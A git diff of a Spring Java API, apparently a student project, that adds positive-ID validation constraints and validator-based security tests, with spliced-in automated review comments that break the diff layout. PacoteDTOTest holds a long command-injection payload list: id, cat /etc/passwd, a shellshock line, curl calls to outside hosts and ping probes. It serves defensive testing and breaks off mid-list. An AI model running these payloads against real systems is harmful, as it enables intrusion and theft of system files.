diff --git a/desofsApi/src/main/java/isep/ipp/pt/api/desofs/Dto/EncomendaDTO/ControllerLayer/EncomendaDTOPatchRequest.java b/desofsApi/src/main/java/isep/ipp/pt/api/desofs/Dto/EncomendaDTO/ControllerLayer/EncomendaDTOPatchRequest.java
index 03492ffb..a4ff9910 100644
--- a/desofsApi/src/main/java/isep/ipp/pt/api/desofs/Dto/EncomendaDTO/ControllerLayer/EncomendaDTOPatchRequest.java
+++ b/desofsApi/src/main/java/isep/ipp/pt/api/desofs/Dto/EncomendaDTO/ControllerLayer/EncomendaDTOPatchRequest.java
@@ -14,6 +14,7 @@ public class EncomendaDTOPatchRequest {
 @NotNull
+ @Positive
 private Long encomendaId;
 @Min(value = 1, message = "Número de refeições por semana inválido")
@@ -31,8 +32,10 @@ public class EncomendaDTOPatchRequest {
 @JsonFormat(pattern="yyyy-MM-dd HH:mm:ss")
 private LocalDateTime dataEncomenda;
 @NotNull
+ @Positive
 private Long pacoteId;
 @NotNull
+ @Positive
 private Long userId;
 private Estado estado;
diff --git a/desofsApi/src/main/java/isep/ipp/pt/api/desofs/Dto/EncomendaDTO/ControllerLayer/EncomendaDTOResponse.java b/desofsApi/src/main/java/isep/ipp/pt/api/desofs/Dto/EncomendaDTO/ControllerLayer/EncomendaDTOResponse.java
index 5f6dca19..e4b306bf 100644
--- a/desofsApi/src/main/java/isep/ipp/pt/api/desofs/Dto/EncomendaDTO/ControllerLayer/EncomendaDTOResponse.java
+++ b/desofsApi/src/main/java/isep/ipp/pt/api/desofs/Dto/EncomendaDTO/ControllerLayer/EncomendaDTOResponse.java
@@ -12,6 +12,8 @@ public class EncomendaDTOResponse {
+ @NotNull
+ @Positive
 private Long encomendaId;
 @Min(value = 1, message = "Número de refeições por semana inválido")
 @Max(value = 7, message = "Número de refeições por semana inválido")
diff --git a/desofsApi/src/main/java/isep/ipp/pt/api/desofs/Dto/EncomendaDTO/ControllerLayer/EncomendaDTOSaveRequest.java b/desofsApi/src/main/java/isep/ipp/pt/api/desofs/Dto/EncomendaDTO/ControllerLayer/EncomendaDTOSaveRequest.java
index 28b52ae3..73954617 100644
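Review bot: In the EncomendaDTOResponse hunk the new `@NotNull`/`@Positive` on `encomendaId` sit on an outbound DTO, and Bean Validation only evaluates constraints on objects that are explicitly validated (a `@Valid` parameter or a `Validator.validate` call), so unless a response object is passed through a Validator somewhere these two annotations change nothing; the same applies to EncomendaDTOServiceResponse further down. For the request DTOs the `@Positive` additions are a sound defensive bound on identifiers, but they only run if the controller methods declare the body parameter `@Valid`, which this diff does not show — worth confirming for every endpoint that accepts these DTOs, otherwise a zero or negative id still reaches the service. If the response-side annotations are meant as documentation, a comment such as `// Response DTOs are not validated; constraints here only document the contract` would avoid the impression they enforce anything. The enclosing classes start and end outside these hunks.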
--- a/desofsApi/src/main/java/isep/ipp/pt/api/desofs/Dto/EncomendaDTO/ControllerLayer/EncomendaDTOSaveRequest.java
+++ b/desofsApi/src/main/java/isep/ipp/pt/api/desofs/Dto/EncomendaDTO/ControllerLayer/EncomendaDTOSaveRequest.java
@@ -30,8 +30,10 @@ public class EncomendaDTOSaveRequest {
 @JsonFormat(pattern="yyyy-MM-dd HH:mm:ss")
 private LocalDateTime dataEncomenda;
 @NotNull
+ @Positive
 private Long pacoteId;
 @NotNull
+ @Positive
 private Long userId;
 private Estado estado;
diff --git a/desofsApi/src/main/java/isep/ipp/pt/api/desofs/Dto/EncomendaDTO/ServiceLayer/EncomendaDTOServicePatchRequest.java b/desofsApi/src/main/java/isep/ipp/pt/api/desofs/Dto/EncomendaDTO/ServiceLayer/EncomendaDTOServicePatchRequest.java
index 2ec7a18b..60791611 100644
--- a/desofsApi/src/main/java/isep/ipp/pt/api/desofs/Dto/EncomendaDTO/ServiceLayer/EncomendaDTOServicePatchRequest.java
+++ b/desofsApi/src/main/java/isep/ipp/pt/api/desofs/Dto/EncomendaDTO/ServiceLayer/EncomendaDTOServicePatchRequest.java
@@ -11,6 +11,7 @@ public class EncomendaDTOServicePatchRequest {
 @NotNull
+ @Positive
 private Long encomendaId;
 @Min(value = 1, message = "Número de refeições por semana inválido")
@@ -28,8 +29,10 @@ public class EncomendaDTOServicePatchRequest {
 @JsonFormat(pattern="yyyy-MM-dd HH:mm:ss")
 private LocalDateTime dataEncomenda;
 @NotNull
+ @Positive
 private Long pacoteId;
 @NotNull
+ @Positive
 private Long userId;
diff --git a/desofsApi/src/main/java/isep/ipp/pt/api/desofs/Dto/EncomendaDTO/ServiceLayer/EncomendaDTOServiceRequest.java b/desofsApi/src/main/java/isep/ipp/pt/api/desofs/Dto/EncomendaDTO/ServiceLayer/EncomendaDTOServiceRequest.java
index 002a798e..50fccf9f 100644
--- a/desofsApi/src/main/java/isep/ipp/pt/api/desofs/Dto/EncomendaDTO/ServiceLayer/EncomendaDTOServiceRequest.java
+++ b/desofsApi/src/main/java/isep/ipp/pt/api/desofs/Dto/EncomendaDTO/ServiceLayer/EncomendaDTOServiceRequest.java
@@ -25,8 +25,10 @@ public class EncomendaDTOServiceRequest {
 @JsonFormat(pattern="yyyy-MM-dd HH:mm:ss")
 private LocalDateTime dataEncomenda;
 @NotNull
+ @Positive
 private Long pacoteId;
 @NotNull
+ @Positive
 private Long userId;
diff --git a/desofsApi/src/main/java/isep/ipp/pt/api/desofs/Dto/EncomendaDTO/ServiceLayer/EncomendaDTOServiceResponse.java b/desofsApi/src/main/java/isep/ipp/pt/api/desofs/Dto/EncomendaDTO/ServiceLayer/EncomendaDTOServiceResponse.java
index da385ffb..c629fb58 100644
--- a/desofsApi/src/main/java/isep/ipp/pt/api/desofs/Dto/EncomendaDTO/ServiceLayer/EncomendaDTOServiceResponse.java
+++ b/desofsApi/src/main/java/isep/ipp/pt/api/desofs/Dto/EncomendaDTO/ServiceLayer/EncomendaDTOServiceResponse.java
@@ -13,6 +13,7 @@ public class EncomendaDTOServiceResponse {
 @NotNull
+ @Positive
 private Long encomendaId;
 @Min(value = 1, message = "Número de refeições por semana inválido")
 @Max(value = 7, message = "Número de refeições por semana inválido")
diff --git a/desofsApi/src/main/java/isep/ipp/pt/api/desofs/Dto/EncomendaDTO/ServiceLayer/EncomendaPatchDTOService.java b/desofsApi/src/main/java/isep/ipp/pt/api/desofs/Dto/EncomendaDTO/ServiceLayer/EncomendaPatchDTOService.java
index 2f6c4af8..b89b3da5 100644
--- a/desofsApi/src/main/java/isep/ipp/pt/api/desofs/Dto/EncomendaDTO/ServiceLayer/EncomendaPatchDTOService.java
+++ b/desofsApi/src/main/java/isep/ipp/pt/api/desofs/Dto/EncomendaDTO/ServiceLayer/EncomendaPatchDTOService.java
@@ -12,6 +12,7 @@ public class EncomendaPatchDTOService {
 @NotNull
+ @Positive
 private Long encomendaId;
 @Min(value = 1, message = "Número de refeições por semana inválido")
diff --git a/desofsApi/src/main/java/isep/ipp/pt/api/desofs/Dto/PacoteDTO/ControllerLayer/PacoteDTOPatchRequest.java b/desofsApi/src/main/java/isep/ipp/pt/api/desofs/Dto/PacoteDTO/ControllerLayer/PacoteDTOPatchRequest.java
index 763209b7..b1f96ca6 100644
--- a/desofsApi/src/main/java/isep/ipp/pt/api/desofs/Dto/PacoteDTO/ControllerLayer/PacoteDTOPatchRequest.java
+++ b/desofsApi/src/main/java/isep/ipp/pt/api/desofs/Dto/PacoteDTO/ControllerLayer/PacoteDTOPatchRequest.java
@@ -5,6 +5,7 @@ public class PacoteDTOPatchRequest {
 @NotNull
+ @Positive
 private final Long pacoteId;
@@ -14,7 +15,6 @@ public class PacoteDTOPatchRequest {
 @Size(max = 16, message = "Nome do pacote inválido")
 private final String nome;
- @NotBlank
 @Min(value = 0, message = "Preço base do pacote inválido")
 @Max(value = 500, message = "Preço base do pacote inválido")
 private final double pacoteBasePrice;
@@ -25,6 +25,8 @@ public class PacoteDTOPatchRequest {
 private final String pacoteDescription;
 private final boolean disabled;
+ @Positive
+ @NotNull
 private final Long tipoPacote;
 public PacoteDTOPatchRequest(Long pacoteId,String nome, double pacoteBasePrice, String pacoteDescription, boolean disabled, Long tipoPacote) {
diff --git a/desofsApi/src/main/java/isep/ipp/pt/api/desofs/Dto/PacoteDTO/ControllerLayer/PacoteDTOSaveRequest.java b/desofsApi/src/main/java/isep/ipp/pt/api/desofs/Dto/PacoteDTO/ControllerLayer/PacoteDTOSaveRequest.java
index a636c545..f4ccd64e 100644
--- a/desofsApi/src/main/java/isep/ipp/pt/api/desofs/Dto/PacoteDTO/ControllerLayer/PacoteDTOSaveRequest.java
+++ b/desofsApi/src/main/java/isep/ipp/pt/api/desofs/Dto/PacoteDTO/ControllerLayer/PacoteDTOSaveRequest.java
@@ -22,6 +22,8 @@ public class PacoteDTOSaveRequest {
 private final String pacoteDescription;
 private final boolean disabled;
+ @NotNull
+ @Positive
 private final Long tipoPacote;
 public PacoteDTOSaveRequest(String nome, double pacoteBasePrice, String pacoteDescription, boolean disabled, Long tipoPacote) {
diff --git a/desofsApi/src/main/java/isep/ipp/pt/api/desofs/Dto/PacoteDTO/ServiceLayer/PacoteDTOServicePatchRequest.java b/desofsApi/src/main/java/isep/ipp/pt/api/desofs/Dto/PacoteDTO/ServiceLayer/PacoteDTOServicePatchRequest.java
index 8da43841..adeacd63 100644
--- a/desofsApi/src/main/java/isep/ipp/pt/api/desofs/Dto/PacoteDTO/ServiceLayer/PacoteDTOServicePatchRequest.java
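Review bot: In the third PacoteDTOPatchRequest hunk `tipoPacote` is annotated `@Positive` before `@NotNull`, while every other field in this commit — including `pacoteId` two hunks above and `tipoPacote` in PacoteDTOSaveRequest — is written `@NotNull` then `@Positive`; the order has no effect on validation, but the flipped pair is repeated in PacoteDTOServicePatchRequest and PacoteDTOServiceRequest on the next line, so the three should be normalised to `@NotNull` / `@Positive` for consistency. Dropping `@NotBlank` from `double pacoteBasePrice` is right, since that constraint has no validator for numeric types; note though that the `@Min`/`@Max` left on a `double` are only optionally supported by the Bean Validation spec (Hibernate Validator accepts them with rounding caveats), so `@DecimalMin`/`@DecimalMax`, or a `BigDecimal` field, is the portable form if the price bound matters. The constructor that follows is cut off by the hunk.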
+++ b/desofsApi/src/main/java/isep/ipp/pt/api/desofs/Dto/PacoteDTO/ServiceLayer/PacoteDTOServicePatchRequest.java
@@ -4,6 +4,7 @@ public class PacoteDTOServicePatchRequest {
 @NotNull
+ @Positive
 private final Long pacoteId;
@@ -24,6 +25,8 @@ public class PacoteDTOServicePatchRequest {
 private final String pacoteDescription;
 private final boolean disabled;
+ @Positive
+ @NotNull
 private final Long tipoPacote;
 public PacoteDTOServicePatchRequest(Long pacoteId,String nome, double pacoteBasePrice, String pacoteDescription, boolean disabled, Long tipoPacote) {
diff --git a/desofsApi/src/main/java/isep/ipp/pt/api/desofs/Dto/PacoteDTO/ServiceLayer/PacoteDTOServiceRequest.java b/desofsApi/src/main/java/isep/ipp/pt/api/desofs/Dto/PacoteDTO/ServiceLayer/PacoteDTOServiceRequest.java
index 49d291e3..5bf639fb 100644
--- a/desofsApi/src/main/java/isep/ipp/pt/api/desofs/Dto/PacoteDTO/ServiceLayer/PacoteDTOServiceRequest.java
+++ b/desofsApi/src/main/java/isep/ipp/pt/api/desofs/Dto/PacoteDTO/ServiceLayer/PacoteDTOServiceRequest.java
@@ -18,6 +18,8 @@ public class PacoteDTOServiceRequest {
 private final String pacoteDescription;
 private final boolean disabled;
+ @Positive
+ @NotNull
 private final Long tipoPacote;
 public PacoteDTOServiceRequest(String nome, double pacoteBasePrice, String pacoteDescription, boolean disabled, Long tipoPacote) {
diff --git a/desofsApi/src/main/java/isep/ipp/pt/api/desofs/Dto/PacoteDTO/ServiceLayer/PacotePatchDTOService.java b/desofsApi/src/main/java/isep/ipp/pt/api/desofs/Dto/PacoteDTO/ServiceLayer/PacotePatchDTOService.java
index 001771c5..0ef7c93b 100644
--- a/desofsApi/src/main/java/isep/ipp/pt/api/desofs/Dto/PacoteDTO/ServiceLayer/PacotePatchDTOService.java
+++ b/desofsApi/src/main/java/isep/ipp/pt/api/desofs/Dto/PacoteDTO/ServiceLayer/PacotePatchDTOService.java
@@ -6,6 +6,7 @@ public class PacotePatchDTOService {
 @NotNull
+ @Positive
 private final Long pacoteId;
diff --git a/desofsApi/src/main/java/isep/ipp/pt/api/desofs/Dto/ReviewDTO/ControllerLayer/ReviewDTOPatchRequest.java b/desofsApi/src/main/java/isep/ipp/pt/api/desofs/Dto/ReviewDTO/ControllerLayer/ReviewDTOPatchRequest.java
index 1754bb5c..eaa3befe 100644
--- a/desofsApi/src/main/java/isep/ipp/pt/api/desofs/Dto/ReviewDTO/ControllerLayer/ReviewDTOPatchRequest.java
+++ b/desofsApi/src/main/java/isep/ipp/pt/api/desofs/Dto/ReviewDTO/ControllerLayer/ReviewDTOPatchRequest.java
@@ -19,8 +19,10 @@ public class ReviewDTOPatchRequest {
 private final int rating;
 @NotNull
+ @Positive
 private final Long user;
 @NotNull
+ @Positive
 private final Long pacote;
 public ReviewDTOPatchRequest(Long reviewId,String reviewText, int rating, Long user, Long pacote) {
diff --git a/desofsApi/src/main/java/isep/ipp/pt/api/desofs/Dto/ReviewDTO/ControllerLayer/ReviewDTOSaveRequest.java b/desofsApi/src/main/java/isep/ipp/pt/api/desofs/Dto/ReviewDTO/ControllerLayer/ReviewDTOSaveRequest.java
index 1b45df81..c759b663 100644
--- a/desofsApi/src/main/java/isep/ipp/pt/api/desofs/Dto/ReviewDTO/ControllerLayer/ReviewDTOSaveRequest.java
+++ b/desofsApi/src/main/java/isep/ipp/pt/api/desofs/Dto/ReviewDTO/ControllerLayer/ReviewDTOSaveRequest.java
@@ -16,8 +16,10 @@ public class ReviewDTOSaveRequest {
 private final int rating;
 @NotNull
+ @Positive
 private final Long user;
 @NotNull
+ @Positive
 private final Long pacote;
 public ReviewDTOSaveRequest(String reviewText, int rating, Long user, Long pacote) {
diff --git a/desofsApi/src/main/java/isep/ipp/pt/api/desofs/Dto/ReviewDTO/ServiceLayer/ReviewDTOServicePatchRequest.java b/desofsApi/src/main/java/isep/ipp/pt/api/desofs/Dto/ReviewDTO/ServiceLayer/ReviewDTOServicePatchRequest.java
index 0726240d..ce251b87 100644
--- a/desofsApi/src/main/java/isep/ipp/pt/api/desofs/Dto/ReviewDTO/ServiceLayer/ReviewDTOServicePatchRequest.java
+++ b/desofsApi/src/main/java/isep/ipp/pt/api/desofs/Dto/ReviewDTO/ServiceLayer/ReviewDTOServicePatchRequest.java
@@ -19,8 +19,10 @@ public class ReviewDTOServicePatchRequest {
 private final int rating;
 @NotNull
+ @Positive
 private final Long user;
 @NotNull
+ @Positive
 private final Long pacote;
 public ReviewDTOServicePatchRequest(Long reviewId,String reviewText, int rating, Long user, Long pacote) {
diff --git a/desofsApi/src/test/java/isep/ipp/pt/api/desofs/Controllers/EncomendaControllerTest.java b/desofsApi/src/test/java/isep/ipp/pt/api/desofs/Controllers/EncomendaControllerTest.java
index a9e727db..f3d1e61a 100644
--- a/desofsApi/src/test/java/isep/ipp/pt/api/desofs/Controllers/EncomendaControllerTest.java
+++ b/desofsApi/src/test/java/isep/ipp/pt/api/desofs/Controllers/EncomendaControllerTest.java
@@ -7,10 +7,7 @@ import isep.ipp.pt.api.desofs.Model.TipoPacote;
 import isep.ipp.pt.api.desofs.Model.UserModel.Role;
 import isep.ipp.pt.api.desofs.Model.UserModel.User;
-import isep.ipp.pt.api.desofs.Repository.Interface.EncomendaServiceRepo;
-import isep.ipp.pt.api.desofs.Repository.Interface.PacoteServiceRepo;
-import isep.ipp.pt.api.desofs.Repository.Interface.TipoPacoteServiceRepo;
-import isep.ipp.pt.api.desofs.Repository.Interface.UserServiceRepo;
+import isep.ipp.pt.api.desofs.Repository.Interface.*;
 import isep.ipp.pt.api.desofs.Service.EncomendaService.EncomendaService;
 import org.junit.jupiter.api.*;
 import org.junit.jupiter.params.ParameterizedTest;
@@ -41,9 +38,15 @@ class EncomendaControllerTest {
 @Autowired
 private UserServiceRepo userRepo;
+ @Autowired
+ private ReviewServiceRepo reviewServiceRepo;
+ @Autowired
+ private ReceitaServiceRepo receitaServiceRepo;
 @BeforeEach
 public void populate() {
+ receitaServiceRepo.deleteAll();
+ reviewServiceRepo.deleteAll();
 encomendaRepo.deleteAll();
 pacoteRepo.deleteAll();
 userRepo.deleteAll();
@@ -60,6 +63,8 @@ public void populate() {
 @AfterEach
 public void clean() {
+ receitaServiceRepo.deleteAll();
+ reviewServiceRepo.deleteAll();
 encomendaRepo.deleteAll();
 pacoteRepo.deleteAll();
 userRepo.deleteAll();
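Review bot: The first EncomendaControllerTest hunk replaces four explicit `Repository.Interface` imports with `import isep.ipp.pt.api.desofs.Repository.Interface.*;`, which hides which repositories the test depends on and invites name clashes as that package grows; the same wildcard is introduced in the PacoteControllerTest hunk on the next line, and in both cases keeping the explicit imports and adding the two new repository types is only two extra lines. The `deleteAll()` sequence is now duplicated verbatim in `populate()` and `clean()` (and in PacoteControllerTest's `setUp()`/`tearDown()`), so the deletion order lives in two places per class and can drift; a private helper called from both keeps it in one. The end of `populate()` and of `clean()` is outside these hunks.
```java
    @BeforeEach
    public void populate() {
        clearRepositories();
        // … unchanged: fixture creation …
    }

    @AfterEach
    public void clean() {
        clearRepositories();
    }

    /** Empties every repository the fixtures touch, in the same order the setup used. */
    private void clearRepositories() {
        receitaServiceRepo.deleteAll();
        reviewServiceRepo.deleteAll();
        encomendaRepo.deleteAll();
        pacoteRepo.deleteAll();
        userRepo.deleteAll();
    }
```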
diff --git a/desofsApi/src/test/java/isep/ipp/pt/api/desofs/Controllers/PacoteControllerTest.java b/desofsApi/src/test/java/isep/ipp/pt/api/desofs/Controllers/PacoteControllerTest.java
index 6569a95f..95461d7e 100644
--- a/desofsApi/src/test/java/isep/ipp/pt/api/desofs/Controllers/PacoteControllerTest.java
+++ b/desofsApi/src/test/java/isep/ipp/pt/api/desofs/Controllers/PacoteControllerTest.java
@@ -4,9 +4,7 @@ import isep.ipp.pt.api.desofs.Dto.PacoteDTO.ControllerLayer.PacoteDTOSaveRequest;
 import isep.ipp.pt.api.desofs.Model.Pacote;
 import isep.ipp.pt.api.desofs.Model.TipoPacote;
-import isep.ipp.pt.api.desofs.Repository.Interface.PacoteServiceRepo;
-import isep.ipp.pt.api.desofs.Repository.Interface.ReviewServiceRepo;
-import isep.ipp.pt.api.desofs.Repository.Interface.TipoPacoteServiceRepo;
+import isep.ipp.pt.api.desofs.Repository.Interface.*;
 import isep.ipp.pt.api.desofs.Service.PacoteService.PacoteService;
 import org.apache.catalina.core.ApplicationContext;
 import org.junit.jupiter.api.*;
@@ -32,10 +30,16 @@ class PacoteControllerTest {
 private TipoPacoteServiceRepo tipoPacoteServiceRepo;
 @Autowired
 private ReviewServiceRepo reviewServiceRepo;
+ @Autowired
+ private EncomendaServiceRepo encomendaServiceRepo;
+ @Autowired
+ private ReceitaServiceRepo receitaServiceRepo;
 @BeforeEach
 public void setUp() {
+ receitaServiceRepo.deleteAll();
+ encomendaServiceRepo.deleteAll();
 reviewServiceRepo.deleteAll();
 pacoteServiceRepo.deleteAll();
 TipoPacote tp1 = new TipoPacote(1L, "TugaTube");
@@ -45,6 +49,9 @@ public void setUp() {
 @AfterEach
 public void tearDown() {
+ receitaServiceRepo.deleteAll();
+ encomendaServiceRepo.deleteAll();
+ reviewServiceRepo.deleteAll();
 pacoteServiceRepo.deleteAll();
 tipoPacoteServiceRepo.deleteAll();
 }
diff --git a/desofsApi/src/test/java/isep/ipp/pt/api/desofs/Utils/PersonalValidationTest.java b/desofsApi/src/test/java/isep/ipp/pt/api/desofs/Utils/PersonalValidationTest.java
index cdbe2cef..d7c531df 100644
--- a/desofsApi/src/test/java/isep/ipp/pt/api/desofs/Utils/PersonalValidationTest.java
+++ b/desofsApi/src/test/java/isep/ipp/pt/api/desofs/Utils/PersonalValidationTest.java
@@ -8,6 +8,7 @@ import org.junit.jupiter.params.ParameterizedTest;
 import org.junit.jupiter.params.provider.CsvSource;
 import org.mockito.Mockito;
+import org.springframework.boot.test.context.SpringBootTest;
 import java.util.Collections;
 import java.util.Set;
@@ -15,6 +16,7 @@ import static org.junit.jupiter.api.Assertions.*;
 import static org.mockito.Mockito.when;
+@SpringBootTest
 class PersonalValidationTest {
 private PersonalValidation personalValidation;
diff --git a/desofsApi/src/test/java/isep/ipp/pt/api/desofs/securityTests/EncomendaDTOTest.java b/desofsApi/src/test/java/isep/ipp/pt/api/desofs/securityTests/EncomendaDTOTest.java
new file mode 100644
index 00000000..5386c313
--- /dev/null
+++ b/desofsApi/src/test/java/isep/ipp/pt/api/desofs/securityTests/EncomendaDTOTest.java
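Review bot: `@SpringBootTest` is added to PersonalValidationTest in the second hunk, yet the visible lines show a Mockito-driven unit test (`Mockito`, `when`, a plain `personalValidation` field) and no `@Autowired` injection point, so the annotation boots the full application context — and whatever infrastructure that context needs — on every run of this class without the test using it. Unless PersonalValidation requires a bean from the context, which nothing in this hunk shows, the new import and the annotation should be dropped; if context wiring really is needed, the field should be `@Autowired` rather than constructed by hand so the reason for the annotation is visible. The class body continues outside the hunk.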
@@ -0,0 +1,123 @@
+package isep.ipp.pt.api.desofs.securityTests;
+
+import isep.ipp.pt.api.desofs.Dto.EncomendaDTO.ControllerLayer.EncomendaDTOSaveRequest;
+import isep.ipp.pt.api.desofs.Model.Estado;
+import jakarta.validation.ConstraintViolation;
+import jakarta.validation.Validation;
+import jakarta.validation.Validator;
+import org.junit.jupiter.api.BeforeEach;
+import org.junit.jupiter.api.DisplayName;
+import org.junit.jupiter.params.ParameterizedTest;
+import org.junit.jupiter.params.provider.CsvSource;
+
+import java.time.LocalDateTime;
+import java.util.Set;
+
+import static org.junit.jupiter.api.Assertions.*;
+
+
+class EncomendaDTOTest {
+
+ private Validator validator;
+ @BeforeEach
+ void setUp() {
+ validator = Validation.buildDefaultValidatorFactory().getValidator();
+ }
+
+
+ @ParameterizedTest
+ @CsvSource(textBlock =
+ """
+ -12
+ 0
+ -3
+ -1
+ 8
+ 9
+ 123
+ 6431
+ """)
+ @DisplayName("Test security vulnerabilities for number of meals")
+ public void testSecurityVulnerabilitiesForNumberOfMeals(int numberOfMeals) {
+ EncomendaDTOSaveRequest response = new EncomendaDTOSaveRequest(numberOfMeals, 2,2, LocalDateTime.now(), 1L, Estado.REGISTADO, 1L);
+ Set> violations = validator.validate(response);
+ assertFalse(violations.isEmpty());
+ }
+
+ @ParameterizedTest
+ @CsvSource(textBlock =
+ """
+ -12
+ 0
+ -23
+ -412
+ -1
+ -99
+ """)
+ @DisplayName("Test security vulnerabilities for price")
+ public void testSecurityVulnerabilitiesForPrice(double price) {
+ EncomendaDTOSaveRequest response = new EncomendaDTOSaveRequest(2, 2,price, LocalDateTime.now(), 1L, Estado.REGISTADO, 1L);
+ Set> violations = validator.validate(response);
+ assertFalse(violations.isEmpty());
+ }
+
+ @ParameterizedTest
+ @CsvSource(textBlock =
+ """
+ 0
+ 6
+ -1
+ -3
+ 7
+ 8
+ 9
+ 996
+ -1325
+ """)
+ @DisplayName("Test security vulnerabilities for number of people ")
+ public void testSecurityVulnerabilitiesForNumberOfPeople(int numberOfPeople) {
+ EncomendaDTOSaveRequest response = new EncomendaDTOSaveRequest(2, numberOfPeople, 2, LocalDateTime.now(), 1L, Estado.REGISTADO, 1L);
+ Set> violations = validator.validate(response);
+ assertFalse(violations.isEmpty());
+ }
+ @ParameterizedTest
+ @CsvSource(textBlock =
+ """
+ 0
+ -6
+ -1
+ -3
+ -7
+ -8
+ -9
+ -996
+ -1325
+ """)
+ @DisplayName("Test security vulnerabilities for Pacote ID")
+ public void testSecurityVulnerabilitiesForPacoteID(Long pacoteId) {
+ EncomendaDTOSaveRequest response = new EncomendaDTOSaveRequest(2, 2, 2, LocalDateTime.now(), pacoteId, Estado.REGISTADO, 1L);
+ Set> violations = validator.validate(response);
+ assertFalse(violations.isEmpty());
+ }
+
+ @ParameterizedTest
+ @CsvSource(textBlock =
+ """
+ 0
+ -6
+ -1
+ -3
+ -7
+ -8
+ -9
+ -996
+ -1325
+ """)
+ @DisplayName("Test security vulnerabilities for User ID")
+ public void testSecurityVulnerabilitiesForUserId(Long userId) {
+ EncomendaDTOSaveRequest response = new EncomendaDTOSaveRequest(2, 2, 2, LocalDateTime.now(),1L, Estado.REGISTADO, userId);
+ Set> violations = validator.validate(response);
+ assertFalse(violations.isEmpty());
+ }
+
+}
\ No newline at end of file
diff --git a/desofsApi/src/test/java/isep/ipp/pt/api/desofs/securityTests/PacoteDTOTest.java b/desofsApi/src/test/java/isep/ipp/pt/api/desofs/securityTests/PacoteDTOTest.java
new file mode 100644
index 00000000..af74a450
--- /dev/null
+++ b/desofsApi/src/test/java/isep/ipp/pt/api/desofs/securityTests/PacoteDTOTest.java
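Review bot: Every test in the new EncomendaDTOTest asserts only `assertFalse(violations.isEmpty())`, so a violation on any field makes the test pass — `testSecurityVulnerabilitiesForPacoteID`, for example, would still succeed if the `pacoteId` constraint were missing but another fixture value tripped a different one. Asserting on the property path pins the constraint actually under test: `assertTrue(violations.stream().anyMatch(v -> "pacoteId".equals(v.getPropertyPath().toString())));`, and likewise `userId` and the meals, people and price fields in the other four methods. A complementary positive case — a fully valid request yielding an empty violation set — is also missing, and it is the one that catches an over-restrictive or mis-typed annotation on the DTO. The `LocalDateTime.now()` in each fixture makes the tests time-dependent should `dataEncomenda` ever receive a temporal constraint; a fixed `LocalDateTime.of(...)` value avoids that.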
@@ -0,0 +1,790 @@ +package isep.ipp.pt.api.desofs.securityTests; + +import isep.ipp.pt.api.desofs.Dto.PacoteDTO.ControllerLayer.PacoteDTOPatchRequest; +import isep.ipp.pt.api.desofs.Dto.PacoteDTO.ControllerLayer.PacoteDTOSaveRequest; +import jakarta.validation.ConstraintViolation; +import jakarta.validation.Validation; +import jakarta.validation.Validator; +import org.junit.jupiter.api.BeforeEach; +import org.junit.jupiter.api.DisplayName; +import org.junit.jupiter.params.ParameterizedTest; +import org.junit.jupiter.params.provider.CsvSource; +import org.springframework.boot.test.context.SpringBootTest; + +import java.util.Set; + +import static org.junit.jupiter.api.Assertions.*; + +@SpringBootTest +class PacoteDTOTest { + + + private Validator validator; + @BeforeEach + void setUp() { + validator = Validation.buildDefaultValidatorFactory().getValidator(); + } + + + + @ParameterizedTest + @CsvSource({ + "'1; DROP TABLE users;'", + "''", + "''", + "'',", + "''", + "''", + "''", + "'/index.html|id|'", + "';id;'", + "';id'", + "';netstat -a;'", + "';system(\'cat /etc/passwd\')'", + "'|id'", + "'|/usr/bin/id'", + "'|id|'", + "'|/usr/bin/id|'", + "'||/usr/bin/id|'", + "'|id;', 1", + "'||/usr/bin/id;'", + "';id|'", + "';|/usr/bin/id|'", + "'\\n/bin/ls -al\\n'", + "'\\n/usr/bin/id\\n'", + "'\\nid\\n'", + "'\\n/usr/bin/id;'", + "'\\nid;'", + "'\\n/usr/bin/id|'", + "'\\nid|'", + "';/usr/bin/id\\n'", + "';id\\n'", + "'|usr/bin/id\\n'", + "'|nid\\n'", + "'`id`'", + "'`/usr/bin/id`'", + "'a);id'", + "'a;id'", + "'a);id;'", + "'a;id;'", + "'a);id|'", + "'a;id|'", + "'a)|id'", + "'a|id'", + "'a)|id;'", + "'a|id'", + "'|/bin/ls -al'", + "'a);/usr/bin/id'", + "'a;/usr/bin/id'", + "'a);/usr/bin/id;'", + "'a;/usr/bin/id;'", + "'a);/usr/bin/id|'", + "'a;/usr/bin/id|'", + "'a)|/usr/bin/id'", + "'a|/usr/bin/id'", + "'a)|/usr/bin/id;'", + "'a|/usr/bin/id'", + "';system(\'cat /etc/passwd\')'", + "';system(\'id\')', 1", + "';system(\'/usr/bin/id\')'", + "'%0Acat /etc/passwd'", + 
"'%0A/usr/bin/id'", + "'%0Aid'", + "'%0A/usr/bin/id%0A'", + "'%0Aid%0A'", + "'& ping -i 30 127.0.0.1 &'", + "'& ping -n 30 127.0.0.1 &'", + "'%0a ping -i 30 127.0.0.1 %0a'", + "'`ping 127.0.0.1`'", + "'%0Acat /etc/passwd'", + "'%0A/usr/bin/id'", + "'%0Aid'", + "'%0A/usr/bin/id%0A'", + "'%0Aid%0A', 1", + "'& ping -i 30 127.0.0.1 &'", + "'& ping -n 30 127.0.0.1 &'", + "'%0a ping -i 30 127.0.0.1 %0a'", + "'`ping 127.0.0.1`'", + "||", + "|", + ";", + "'", + "'\"", + "\"'", + "&", + "&&", + "%0a", + "%0a%0d", + "%0Aid", + "%0a id %0a", + "%0Aid%0A", + "%0a ping -i 30 127.0.0.1 %0a", + "%0A/usr/bin/id", + "%0A/usr/bin/id%0A", + "%2 -n 21 127.0.0.1||`ping -c 21 127.0.0.1`", + "#' |ping -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #\"", + "|ping -n 21 127.0.0.1", + "%20{${phpinfo()}}", + "%20{${sleep(20)}}", + "%20{${sleep(3)}}", + "a|id|", "a;id|", + "a;id;", + "a;id\n", + "() { :;}; curl http://135.23.158.130/.testing/shellshock.txt?vuln=12", + "| curl http://crowdshield.com/.testing/rce.txt", + "& curl http://crowdshield.com/.testing/rce.txt", + "; curl https://crowdshield.com/.testing/rce_vuln.txt", + "&& curl https://crowdshield.com/.testing/rce_vuln.txt", + "curl https://crowdshield.com/.testing/rce_vuln.txt", + "curl https://crowdshield.com/.testing/rce_vuln.txt ||`curl https://crowdshield.com/.testing/rce_vuln.txt`", + "#' |curl https://crowdshield.com/.testing/rce_vuln.txt||`curl https://crowdshield.com/.testing/rce_vuln.txt` #\"", + "|curl https://crowdshield.com/.testing/rce_vuln.txt", + "curl https://crowdshield.com/.testing/rce_vuln.txt", + "$(`curl https://crowdshield.com/.testing/rce_vuln.txt?req=22jjffjbn`)", + "| dir", "; dir", "$(`dir`)", "& dir", + 